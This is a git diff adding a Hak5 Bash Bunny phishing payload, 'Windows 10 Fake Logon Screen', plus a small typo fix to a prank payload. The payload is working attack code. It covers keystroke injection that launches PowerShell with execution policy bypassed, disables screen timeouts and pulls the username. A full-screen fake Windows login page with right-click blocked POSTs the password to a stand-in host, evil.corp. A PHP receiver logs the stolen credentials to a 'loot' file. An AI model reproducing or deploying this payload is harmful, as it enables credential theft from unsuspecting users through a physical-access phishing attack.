Merge branch 'hak5:master' into master

payloads/library/phishing/windows10_fakelogonscreen/README.md

@@ -0,0 +1,66 @@
+# "Microsoft Windows 10" Fake Logon Screen
+
+- Title:         "Microsoft Windows 10" Fake Logon Screen
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows 10
+- Category:      Phishing
+
+## Description
+
+1) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+2) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+3) Retrieve the current username.
+4) Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
+5) The "Bash Bunny" can be removed because the files are cached in the web browser.
+6) The password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
+readonly INPUT_PLACEHOLDER="Password"
+
+
+```
+
+Example of code for the data receiver :
+```php
+<?php
+
+if (
+    $_SERVER['REQUEST_METHOD'] === 'POST' &&
+    isset($_POST['username']) && !empty($_POST['username']) &&
+    isset($_POST['password']) && !empty($_POST['password'])
+) {
+
+    $remote_addr = (string) $_SERVER['REMOTE_ADDR'];
+    $user_agent = (string) $_SERVER['HTTP_USER_AGENT'];
+    $username = (string) $_POST['username'];
+    $password = (string) $_POST['password'];
+
+    /*
+        touch ./aGFrNQ_loot.log
+        chown www-data:www-data ./aGFrNQ_loot.log
+    */
+    $loot = fopen('aGFrNQ_loot.log', 'a');
+    fwrite($loot, "##\n");
+    fwrite($loot, $remote_addr . "\n");
+    fwrite($loot, $user_agent . "\n");
+    fwrite($loot, $username . ':' . $password . "\n");
+    fwrite($loot, "##\n");
+    fclose($loot);
+
+}
+
+http_response_code(302);
+header('Location: https://hak5.org/');
+exit;
+
+?>
+```

payloads/library/phishing/windows10_fakelogonscreen/payload.txt

@@ -0,0 +1,121 @@
+#!/bin/bash
+#
+# Title:            "Microsoft Windows 10" Fake Logon Screen
+#
+# Description:      
+#                   1) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#                   2) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#                   3) Retrieve the current username.
+#                   4) Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
+#                   5) The "Bash Bunny" can be removed because the files are cached in the web browser.
+#                   6) The password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Phishing
+# Target:           Microsoft Windows 10
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# NOTE
+# ===============
+# Target computer with a single screen.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
+readonly INPUT_PLACEHOLDER="Password"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 8000
+RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 8000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 3500
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+# Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#
+Q STRING "(powercfg /Change monitor-timeout-ac 0); (powercfg /Change monitor-timeout-dc 0)"
+Q ENTER
+Q DELAY 1500
+
+# Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#
+Q STRING "(powercfg /Change standby-timeout-ac 0); (powercfg /Change standby-timeout-dc 0)"
+Q ENTER
+Q DELAY 1500
+
+# Retrieve the current username.
+#
+Q STRING "\"const CURRENT_USERNAME = '\$([Environment]::UserName)';\" | Out-File -FilePath ./TMP.js"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "\"const DROP_URL = '${DROP_URL}';\" | Out-File -FilePath ./TMP.js -Append"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "\"const INPUT_PLACEHOLDER = '${INPUT_PLACEHOLDER}';\" | Out-File -FilePath ./TMP.js -Append"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+# Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
+#
+Q STRING "(Invoke-Expression .\\phishing_files\\index.html); exit"
+Q ENTER
+Q DELAY 9000
+Q TAB
+Q DELAY 2000
+Q ENTER
+Q DELAY 2000
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+
+######## FINISH ########
+
+LED FINISH
+
+# The "Bash Bunny" can be removed because the files are cached in the web browser.
+#
+shutdown -h 0

payloads/library/phishing/windows10_fakelogonscreen/phishing_files/assets/css/backgrounds.css

@@ -0,0 +1,16 @@
+body {
+    min-height: 100vh;
+    background-size: cover;
+    background-repeat: no-repeat;
+    background-position-x: center;
+    background-position-y: center;
+}
+
+.login {
+    min-width: 42px;
+    background-image: url("./../img/submit.png");
+    background-size: cover;
+    background-repeat: no-repeat;
+    background-position-x: center;
+    background-position-y: center;
+}

payloads/library/phishing/windows10_fakelogonscreen/phishing_files/assets/css/fonts.css

@@ -0,0 +1,13 @@
+@font-face {
+    font-family: "text-security-disc";
+    src: url("./../font/text-security-disc.ttf") format("truetype");
+}
+
+body, .password::placeholder {
+    font-family: "Segoe UI";
+    font-weight: lighter;
+}
+
+.password {
+    font-family: "text-security-disc";
+}

payloads/library/phishing/windows10_fakelogonscreen/phishing_files/assets/js/dispatch.js

@@ -0,0 +1,4 @@
+document.querySelector('div#username').innerText = CURRENT_USERNAME;
+document.querySelector('#drop').action = DROP_URL;
+document.querySelector('input#username').value = CURRENT_USERNAME;
+document.querySelector('.password').placeholder = INPUT_PLACEHOLDER;

payloads/library/phishing/windows10_fakelogonscreen/phishing_files/assets/js/fullscreen.js

@@ -0,0 +1,9 @@
+function fullscreen() {
+    let document_element;
+    document_element = document.documentElement;
+    document.querySelector('#fullscreen').style.display = "none";
+    if (document_element.requestFullscreen) {
+        document_element.requestFullscreen();
+        document.querySelector('.password').focus();
+    }
+}

payloads/library/phishing/windows10_fakelogonscreen/phishing_files/assets/js/randomwall.js

@@ -0,0 +1,9 @@
+const WALLPAPERS = [
+    'abstact-nature.jpg',
+    'beach-cave.jpg',
+    'mountains-lake.png',
+    'sea-airplain.png',
+    'solid-blue.jpg',
+    'windows-light.jpg'
+];
+document.querySelector('body').style.backgroundImage = ('url("./assets/img/wallpapers/' + (WALLPAPERS.sort(() => Math.random() - 0.5)[0]) + '")');

payloads/library/phishing/windows10_fakelogonscreen/phishing_files/assets/js/rightclick.js

@@ -0,0 +1,7 @@
+window.addEventListener(
+    'contextmenu', 
+    function(e) {
+        e.preventDefault();
+    }, 
+    false
+);

payloads/library/phishing/windows10_fakelogonscreen/phishing_files/index.html

@@ -0,0 +1,47 @@
+<!DOCTYPE html>
+<html lang="en">
+    <head>
+        <meta charset="UTF-8" />
+        <meta name="viewport" content="width=device-width, initial-scale=1" />
+        <link rel="stylesheet" type="text/css" href="./assets/css/backgrounds.css?v=1.0.0" />
+        <link rel="stylesheet" type="text/css" href="./assets/css/fonts.css?v=1.0.0" />
+        <link rel="stylesheet" type="text/css" href="./assets/framework/bootstrap.min.css?v=5.1.3" />
+        <title></title>
+    </head>
+    <body>
+        <main class="container-fluid">
+            <section class="row">
+                <div class="col-3" style="min-height: 100vh;">
+                    <button id="fullscreen" onclick="fullscreen();">fullscreen</button>
+                </div>
+                <div class="col-6 align-self-center text-center">
+                    <img class="img-fluid opacity-75" src="./assets/img/user.png" title="" />
+                    <div class="h2 my-3 text-white" id="username">User</div>
+                    <div class="row">
+                        <div class="col-6 offset-3">
+                            <form method="POST" id="drop">
+                                <div class="input-group">
+                                    <input class="d-none" id="username" type="text" name="username" />
+                                    <input class="form-control password" type="text" name="password" autocomplete="off" placeholder="Password" required />
+                                    <button class="btn opacity-75 login" type="submit"></button>
+                                </div>
+                            </form>
+                        </div>
+                    </div>
+                </div>
+                <div class="col-3" style="min-height: 100vh;">
+                    <div class="position-absolute bottom-0 end-0">
+                        <img class="img-fluid mx-2 my-3" style="width: 45px;" src="./assets/img/icons/worldwide.png" title="" />
+                        <img class="img-fluid mx-2 my-3" style="width: 45px;" src="./assets/img/icons/network.png" title="" />
+                        <img class="img-fluid ms-2 me-3 my-3" style="width: 45px;" src="./assets/img/icons/power.png" title="" />
+                    </div>
+                </div>
+            </section>
+        </main>
+        <script type="text/javascript" src="./../TMP.js"></script>
+        <script type="text/javascript" src="./assets/js/fullscreen.js?v=1.0.0"></script>
+        <script type="text/javascript" src="./assets/js/rightclick.js?v=1.0.0"></script>
+        <script type="text/javascript" src="./assets/js/randomwall.js?v=1.0.0"></script>
+        <script type="text/javascript" src="./assets/js/dispatch.js?v=1.0.0"></script>
+    </body>
+</html>

payloads/library/prank/Bunny-Flip/payload.txt

@@ -6,7 +6,7 @@
 # Target:        Windows 7 
 # Attackmodes:   HID
 
-ATTACMODE HID
+ATTACKMODE HID
 
 ###### OPTIONS #######